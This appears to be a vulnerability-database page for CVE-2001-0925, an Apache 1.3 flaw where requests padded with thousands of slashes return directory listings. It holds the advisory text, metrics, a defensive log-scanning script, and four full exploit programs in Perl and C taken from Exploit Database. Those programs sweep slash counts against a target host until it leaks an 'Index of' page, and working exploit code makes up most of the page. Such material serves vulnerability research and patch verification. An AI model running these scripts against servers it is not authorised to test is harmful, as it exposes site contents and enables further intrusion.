CVE-2001-0925 : Detail

CVE-2001-0925

Directory Traversal
A01-Broken Access Control
34.48%V3
Network
2002-02-02
04h00 +00:00
2021-06-06
08h08 +00:00

CVE Descriptions

The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
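
A defender-side check for the request pattern described above, as an added example (not part of the CVE record or of any tool it references): it reads Apache Common Log Format lines, finds paths padded with long runs of `/`, flags clients that try many different lengths, and marks 200 responses whose size differs from the normal index page. The function names, thresholds, status codes and sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict

# Apache Common Log Format: host ident user [time] "request line" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S*) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
SLASH_RUN = re.compile(r"/{2,}")


def longest_slash_run(path):
    """Length of the longest run of consecutive '/' characters in a URL path."""
    return max((len(m.group()) for m in SLASH_RUN.finditer(path)), default=0)


def find_slash_probes(lines, run_threshold=32, sweep_min=5):
    """Group padded-slash requests per client; flag sweeps and unusual 200s."""
    root_sizes = Counter()
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        if m["path"] == "/" and status == 200:
            root_sizes[size] += 1  # body size of the normal index page
        run = longest_slash_run(m["path"])
        if run >= run_threshold:
            hits[m["host"]].append((run, status, size))
    baseline = root_sizes.most_common(1)[0][0] if root_sizes else None

    findings = []
    for host, reqs in sorted(hits.items()):
        runs = sorted({run for run, _, _ in reqs})
        findings.append({
            "client": host,
            "requests": len(reqs),
            "run_range": (runs[0], runs[-1]),
            # many distinct lengths from one client: searching for a length
            "sweep": len(runs) >= sweep_min,
            # 200 whose body size is not that of the normal index page
            "possible_listing": sorted(
                run for run, status, size in reqs
                if status == 200 and baseline is not None and size != baseline
            ),
        })
    return findings


def make_line(host, path, status, size):
    """Build one constructed log line (sample data only)."""
    return (f'{host} - - [12/Jun/2001:10:00:00 +0000] '
            f'"GET {path} HTTP/1.0" {status} {size}')


# Constructed sample: normal traffic, one client sweeping slash counts near
# the ~4060 figure quoted on this page, and one isolated padded request.
SAMPLE_LOG = (
    [make_line("198.51.100.20", "/", 200, 1456),
     make_line("198.51.100.20", "/docs//faq.html", 200, 3020),
     make_line("198.51.100.21", "/", 200, 1456)]
    + [make_line("203.0.113.7", "/" * n, 403, 280) for n in range(4055, 4060)]
    + [make_line("203.0.113.7", "/" * 4060, 200, 912)]
    + [make_line("192.0.2.44", "/" * 40, 200, 1456)]
)

if __name__ == "__main__":
    for finding in find_slash_probes(SAMPLE_LOG):
        print(finding)
```

A padded request answered with 200 and the usual index size was served normally; a different size on a 200 is the case worth checking against the directory's `Indexes` and `MultiViews` options and the installed Apache version.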

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 20692

Publication date : 2001-06-12 22h00 +00:00
Author : rfp
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2503/info

Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.

A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.

This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19.

    #!/usr/bin/perl
    #
    # orginal by farm9, Inc. (copyright 2001)
    # then modified by Siberian (www.sentry-labs.com)
    # with more modifications by rfp (www.wiretrip.net/rfp/)
    #
    ##########################################################################

    use libwhisker;
    use Getopt::Std;

    # apache3.pl
    # this exploit was modified to use the libwhisker library, which gives
    # HTTP/1.1, proxy, and SSL support. Plus, small other changes.

    $|++;
    my (%hin,%hout,%args);

    print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
    print "SecurityFocus BID 2503\n\n";
    print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
    print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
    print "Moved to libwhisker by rfp\n\n";

    getopts("p:L:H:sP:R:h:",\%args);

    if($args{h} eq ''){
        print 'Usage: ./apache3.pl <options>, where options:',"\n";
        print '-h host host to scan (must be specified)',"\n";
        print '-p ## host port (default: 80)',"\n";
        print '-L ## low end/start of range (default: 1)',"\n";
        print '-H ## high end/end of range (default: 8192)',"\n";
        print '-P host HTTP proxy via host',"\n";
        print '-R ## HTTP proxy port (default: 80)',"\n";
        print '-s use SSL (can\'t be used with proxy)',"\n";
        exit 0;
    }

    $low = $args{L} || 1;
    $high = $args{H} || 8192;

    &lw::http_init_request(\%hin); # setup our request hash

    $hin{'whisker'}->{'host'}= $args{h};
    $hin{'whisker'}->{'port'}= $args{p} || 80;

    if(defined $args{s}){
        $hin{'whisker'}->{'ssl'} = 1;
        if(defined $args{P}){
            print "SSL not currently compatible with proxy\n";
            exit 1;
        }
    }

    if(defined $args{'P'}){
        $hin{'whisker'}->{'proxy_host'}=$args{P};
        $hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
        print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
        print "port $hin{'whisker'}->{'proxy_port'}\n";
    }

    &lw::http_fixup_request(\%hin); # fix any HTTP requirements

    for($c=$low; $c<=$high; $c++){
        $hin{'whisker'}->{'uri'} = '/' x $c;
        if(&lw::http_do_request(\%hin,\%hout)){
            print "Error: $hout{'whisker'}->{'error'}\n";
            exit 1;
        } else {
            if($hout{'whisker'}->{'http_resp'} == 200 &&
               $hout{'whisker'}->{'data'}=~/index of/i){
                print "Found result using $c slashes.\n";
                exit 0;
            }
        }
        print "."; # for status
    }

    print "\nNot vulnerable (perhaps try a different range).\n";

Exploit Database EDB-ID : 20693

Publication date : 2002-02-20 23h00 +00:00
Author : st0ic
EDB Verified : Yes

    // source: https://www.securityfocus.com/bid/2503/info

    /*
    Program: apacheslash.c
    Original Date: 2-21-02
    Version: 1.0
    Platform: Linux (compiled on SuSE 7.3)
    c0der: st0ic
    site: www.fsix.net
    e-mail: [email protected]

    Revised:
        NONE thus far

    Description:
        This program tests an Apache installation for the "Apache Artificially
        Long Slash Path Directory Listing Exploit." See SecurityFocus.com BID 2503 -
        http://online.securityfocus.com/bid/2503

    Compile:
        gcc apacheslash.c -o apacheslash

    Stuff:
        I know theres already 3 Perl scripts that test this bug out, but there
        execution time is horrible so I was bored and decided to recode it in C
        for execution speed sake. On my box, I think it took about 8 mins to send
        1000 /'s to apache with apache2.pl. It takes about 2 seconds with this
        program. BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT
        vulnerable :-). Check out the securityfocus.com BID 2503 to find out
        whats vulnerable and whats not.

        I also included the comments from apache2.pl exploit which was modified
        by Siberian of sentry-labs.com. Read below for the details:

    /*************************************************
    #!/usr/bin/perl
    #
    # orginal by farm9, Inc. (copyright 2001)
    # new modified code by Siberian (www.sentry-labs.com)
    #
    ########################################################################################
    #
    # Note: This isn't the orginal exploit! This one was modified and partly rewritten.
    #
    # Changes:
    #
    # - help added (more user firendly :-) )
    # - messages added
    # - exploit is now able to be executed on WinNT or 2k.
    # - uses perl version of BSD sockets (compatible to Windows)
    #
    # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
    # of the code and made it esaier to use and cross platform compatible.
    # The old verion used a esaier but not that compaible way of socket stream communication.
    # Any network code was replaced by cross platform compatible BSD sockets.
    # (much better than any other stream method :-) )
    #
    # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
    #
    # Original comment and source is attached below.
    #
    ########################################################################################
    #
    # Name: Apache Artificially Long Slash Path Directory Listing Exploit
    # Author: Matt Watchinski
    # Ref: SecurityFocus BID 2503
    #
    # Affects: Apache 1.3.17 and below
    # Tested on: Apache 1.3.12 running on Debian 2.2
    #
    # Info: This exploit tricks apache into returning a Index of the a directory
    #       even if an index.html file is present. May not work on some OS's
    #
    # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
    #          very specific cases would feed stat() a filename that was longer than
    #          stat() could handle. This would result in a condition where stat()
    #          would return 0 and a directory index would be returned instead of the
    #          default index.html.
    #
    # Code Fragment: /src/main/http_request.c
    #   if (strchr(new_file, '/') == NULL) {
    #       char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
    #
    #       rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
    #       rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
    #       ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ /*
    #       if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part
    #           rnew->finfo.st_mode = 0;
    #       }
    #
    # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
    #             The directory must also have the following Options enabled:
    #             Indexes and MultiView
    #             Some OS's have different conditions on the number of character
    #             you have to pass to stat to make this work. If stat doesn't
    #             return 0 for path names less than 8192 or so internal apache
    #             buffer checks will stop this exploit from working.
    #
    #             Debian needed around 4060 /'s to make this work.
    #
    # Greets: Special thanks to natasha who added a lot of debug to apache for me
    #         while i was trying to figure out what had to be enabled to make this
    #         exploit work. Also thanks to rfp for pointing out that MultiView
    #         needed to be enabled.
    #
    # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us>
    #              Anne for being so sexy <I never though corporate espionage
    #              would be so fun>
    #              All my homies at farm9
    #              DJ Charles / DJ NoloN for the phat beats
    #              Marty (go go gadget snort)
    #              All my ex-bees
    #              RnVjazpIaXZlcndvcmxk
    #
    # I think that wraps it up. Have fun.

    -----snip snip----
    **************************************************/

    #include <stdio.h>
    #include <string.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>

    char tmp[10240];
    char output[10240];
    char *get = "GET ";
    char *slash = "/";
    char *http = " HTTP/1.0\r\n";
    char *end = "\r\n\r\n";
    int c, x;
    int port;
    int low;
    int max;
    int sockfd;
    int bytes_recieved;
    int count;
    char *addr;
    struct sockaddr_in dest_addr;
    struct hostent *he;

    void usage(char *ptr)
    {
        fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr);
        fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr);
        fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n\n");
        exit(1);
    }

    int main(int argc, char *argv[])
    {
        printf("\n\t[ apacheslash.c ]");
        printf("\n\t[ c0ded by st0ic ]");
        printf("\n\t[ Fsix.Net ]");
        printf("\n\t[ [email protected] ]\n\n");

        while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1)
        {
            switch(c)
            {
                case 'h':
                {
                    addr = optarg;
                    break;
                }
                case 'p':
                {
                    port = atoi(optarg);
                    break;
                }
                case 'l':
                {
                    low = atoi(optarg);
                    break;
                }
                case 'm':
                {
                    max = atoi(optarg);
                    break;
                }
                default:
                    usage(argv[0]);
            }
        }

        if ( low > max || addr == NULL )
            usage(argv[0]);

        if ( (he = gethostbyname(addr)) == NULL)
        {
            perror("gethostbyname");
            exit(1);
        }

        dest_addr.sin_family = AF_INET;
        dest_addr.sin_addr = *( (struct in_addr *) he->h_addr);
        dest_addr.sin_port = htons(port);
        memset (&dest_addr.sin_zero, 0, 8);

        printf("\t\n....Working....\n");

        while (low <= max)
        {
            count = low;
            bzero(tmp, sizeof(tmp) );

            if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
            {
                perror("socket");
                break;
            }

            if (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1)
            {
                perror("connect");
                exit(1);
            }

            strcpy(tmp, get);

            /* copy the necessary slashes. */
            for(x = 0; x < count; x++)
                strcat(tmp, slash);

            strcat(tmp, http);
            strcat(tmp, end);

            send(sockfd, tmp, sizeof(tmp), 0);

            bytes_recieved = 1;
            while(bytes_recieved > 0)
            {
                bytes_recieved = recv(sockfd, output, sizeof(output), 0);
                if ( (strstr(output, "Index of") ) != NULL)
                {
                    printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low);
                    close(sockfd);
                    exit(0);
                }
            }

            low++;
            close(sockfd);
        }

        printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n");
        return 0;
    }

Exploit Database EDB-ID : 20694

Publication date : 2001-06-12 22h00 +00:00
Author : farm9
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2503/info

    #!/usr/bin/perl
    #
    # farm9, Inc. (copyright 2001)
    #
    # Name: Apache Artificially Long Slash Path Directory Listing Exploit
    # Author: Matt Watchinski
    # Ref: SecurityFocus BID 2503
    #
    # Affects: Apache 1.3.17 and below
    # Tested on: Apache 1.3.12 running on Debian 2.2
    #
    # Info: This exploit tricks apache into returning a Index of the a directory
    #       even if an index.html file is present. May not work on some OS's
    #
    # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
    #          very specific cases would feed stat() a filename that was longer than
    #          stat() could handle. This would result in a condition where stat()
    #          would return 0 and a directory index would be returned instead of the
    #          default index.html.
    #
    # Code Fragment: /src/main/http_request.c
    #   if (strchr(new_file, '/') == NULL) {
    #       char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
    #
    #       rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
    #       rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
    #       ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */
    #       if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part
    #           rnew->finfo.st_mode = 0;
    #       }
    #
    # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
    #             The directory must also have the following Options enabled:
    #             Indexes and MultiView
    #             Some OS's have different conditions on the number of character
    #             you have to pass to stat to make this work. If stat doesn't
    #             return 0 for path names less than 8192 or so internal apache
    #             buffer checks will stop this exploit from working.
    #
    #             Debian needed around 4060 /'s to make this work.
    #
    # Greets: Special thanks to natasha who added a lot of debug to apache for me
    #         while i was trying to figure out what had to be enabled to make this
    #         exploit work. Also thanks to rfp for pointing out that MultiView
    #         needed to be enabled.
    #
    # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us>
    #              Anne for being so sexy <I never though corporate espionage
    #              would be so fun>
    #              All my homies at farm9
    #              DJ Charles / DJ NoloN for the phat beats
    #              Marty (go go gadget snort)
    #              All my ex-bees
    #              RnVjazpIaXZlcndvcmxk
    #
    # I think that wraps it up. Have fun.
    #
    # Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
    # Where: Hi and low are the range for the number of / to try
    #

    use IO::Socket;

    $low = $ARGV[3]; #Low number of slash characters to try
    $hi = $ARGV[2]; #High number of slash characters to try
    $port = $ARGV[1]; #Port to try to connect to
    $host = $ARGV[0]; #Host to try to connect to

    # Main loop. Not much to this exploit once you figure out what needed to
    # be enabled. Need to do some more testing on sub-dirs to see if it
    # works with them. It should. Also different OS's might use a different number
    # of /. Send me the numbers if you don't mind [email protected]

    while($low <= $hi)
    {
        $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed";

        $url = "";
        $buffer = "";
        $end = "";

        $url = "GET ";
        $buffer = "/" x $low . " HTTP/1.0\r\n";
        $end = "\r\n\r\n";

        $url = $url . $buffer . $end;

        print $socket "$url";
        while(<$socket>)
        {
            if($_ =~ "Index of")
            {
                print "Found the magic number: $low\n";
                print "Now go do it by hand to to see it all\n";
                close($socket);
                exit;
            }
        }

        close($socket);
        $low++;
    }

Exploit Database EDB-ID : 20695

Publication date : 2001-06-12 22h00 +00:00
Author : farm9
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2503/info

    #!/usr/bin/perl
    #
    # orginal by farm9, Inc. (copyright 2001)
    # new modified code by Siberian (www.sentry-labs.com)
    #
    ########################################################################################
    #
    # Note: This isn't the orginal exploit! This one was modified and partly rewritten.
    #
    # Changes:
    #
    # - help added (more user firendly :-) )
    # - messages added
    # - exploit is now able to be executed on WinNT or 2k.
    # - uses perl version of BSD sockets (compatible to Windows)
    #
    # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
    # of the code and made it esaier to use and cross platform compatible.
    # The old verion used a esaier but not that compaible way of socket stream communication.
    # Any network code was replaced by cross platform compatible BSD sockets.
    # (much better than any other stream method :-) )
    #
    # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
    #
    # Original comment and source is attached below.
    #
    ########################################################################################
    #
    # Name: Apache Artificially Long Slash Path Directory Listing Exploit
    # Author: Matt Watchinski
    # Ref: SecurityFocus BID 2503
    #
    # Affects: Apache 1.3.17 and below
    # Tested on: Apache 1.3.12 running on Debian 2.2
    #
    # Info: This exploit tricks apache into returning a Index of the a directory
    #       even if an index.html file is present. May not work on some OS's
    #
    # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
    #          very specific cases would feed stat() a filename that was longer than
    #          stat() could handle. This would result in a condition where stat()
    #          would return 0 and a directory index would be returned instead of the
    #          default index.html.
    #
    # Code Fragment: /src/main/http_request.c
    #   if (strchr(new_file, '/') == NULL) {
    #       char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
    #
    #       rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
    #       rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
    #       ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */
    #       if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part
    #           rnew->finfo.st_mode = 0;
    #       }
    #
    # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
    #             The directory must also have the following Options enabled:
    #             Indexes and MultiView
    #             Some OS's have different conditions on the number of character
    #             you have to pass to stat to make this work. If stat doesn't
    #             return 0 for path names less than 8192 or so internal apache
    #             buffer checks will stop this exploit from working.
    #
    #             Debian needed around 4060 /'s to make this work.
    #
    # Greets: Special thanks to natasha who added a lot of debug to apache for me
    #         while i was trying to figure out what had to be enabled to make this
    #         exploit work. Also thanks to rfp for pointing out that MultiView
    #         needed to be enabled.
    #
    # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us>
    #              Anne for being so sexy <I never though corporate espionage
    #              would be so fun>
    #              All my homies at farm9
    #              DJ Charles / DJ NoloN for the phat beats
    #              Marty (go go gadget snort)
    #              All my ex-bees
    #              RnVjazpIaXZlcndvcmxk
    #
    # I think that wraps it up. Have fun.
    #
    # Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
    # Where: Hi and low are the range for the number of / to try
    #
    #use IO::Socket;
    #
    #$low = $ARGV[3]; #Low number of slash characters to try
    #$hi = $ARGV[2]; #High number of slash characters to try
    #$port = $ARGV[1]; #Port to try to connect to
    #$host = $ARGV[0]; #Host to try to connect to
    #
    # Main loop. Not much to this exploit once you figure out what needed to
    # be enabled. Need to do some more testing on sub-dirs to see if it
    # works with them. It should. Also different OS's might use a different number
    # of /. Send me the numbers if you don't mind [email protected]
    #
    #while($low <= $hi)
    #{
    #
    #$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed";
    #
    # $url = "";
    # $buffer = "";
    # $end = "";
    #
    # $url = "GET ";
    # $buffer = "/" x $low . " HTTP/1.0\r\n";
    # $end = "\r\n\r\n";
    #
    # $url = $url . $buffer . $end;
    #
    # print $socket "$url";
    # while(<$socket>)
    # {
    #     if($_ =~ "Index of")
    #     {
    #         print "Found the magic number: $low\n";
    #         print "Now go do it by hand to to see it all\n";
    #         close($socket);
    #         exit;
    #     }
    # }
    #
    # close($socket);
    # $low++;
    #}

    use Socket;

    print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n";
    print "original exploit code written by Matt Watchinski (www.farm9.com)\n";
    print "rewritten and fixed by Siberian (www.sentry-labs.com)\n\n";

    $host = shift || 'localhost'; #Host to try to connect to
    $port = shift || '80'; #Port to try to connect to
    $hi = shift || '100'; #High number of slash characters to try
    $low = shift || '0'; #Low number of slash characters to try

    if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0'))
    {
        print 'Usage: ./apache2.pl <host> <port> <HI> <Low>';
        print "\nHi and low are the range for the number of \/ to try\n";
        exit 0;
    }

    print "\ntarget: $host";
    print "\nport: $port";
    print "\nhi: $hi";
    print "\nlow: $low\n\nStarting attack...\n\n";

    # Main loop. Not much to this exploit once you figure out what needed to
    # be enabled. Need to do some more testing on sub-dirs to see if it
    # works with them. It should. Also different OS's might use a different number
    # of /. Send me the numbers if you don't mind [email protected]

    $url = "";
    $buffer = "";
    $end = "";

    #$port = (getservbyname($port, 'tcp') || die "No port!");
    $iaddr = inet_aton($host);
    $paddr = sockaddr_in($port, $iaddr) or die "Faild ... SOCKADDR_IN!";
    $proto = getprotobyname('tcp');

    while($low <= $hi)
    {
        socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
        connect(SOCKY, $paddr ) or die "connect: $!";;

        $url = "GET ";
        $buffer = "/" x $low . " HTTP/1.0\r\n";
        $end = "\r\n\r\n";

        $url = $url . $buffer . $end;

        print ".";

        send(SOCKY,$url,0) or die "send: $!";;

        while((recv(SOCKY,$out,1,0)) && ($out ne ""))
        {
            if($out eq "I")
            {
                recv(SOCKY,$out,1,0);
                if($out eq "n")
                {
                    recv(SOCKY,$out,1,0);
                    if($out eq "d")
                    {
                        recv(SOCKY,$out,1,0);
                        if($out eq "e")
                        {
                            recv(SOCKY,$out,1,0);
                            if($out eq "x")
                            {
                                recv(SOCKY,$out,1,0);
                                if($out eq " ")
                                {
                                    recv(SOCKY,$out,1,0);
                                    if($out eq "o")
                                    {
                                        recv(SOCKY,$out,1,0);
                                        if($out eq "f")
                                        {
                                            print "Found the magic number: $low\n";
                                            print "Now go do it by hand to to see it all\n";
                                            close(SOCKY);
                                            exit 0;
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }

        close(SOCKY);
        $low++;
    }

    print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";

Products Mentioned

Configuration 0

Apache>>Http_server >> Version 1.3.11

Apache>>Http_server >> Version 1.3.12

Apache>>Http_server >> Version 1.3.14

Apache>>Http_server >> Version 1.3.17

Configuration 0

Debian>>Debian_linux >> Version 2.2

References

http://www.securityfocus.com/archive/1/193081
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/178066
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/168497
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.debian.org/security/2001/dsa-067
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.securityfocus.com/bid/2503
Tags : vdb-entry, x_refsource_BID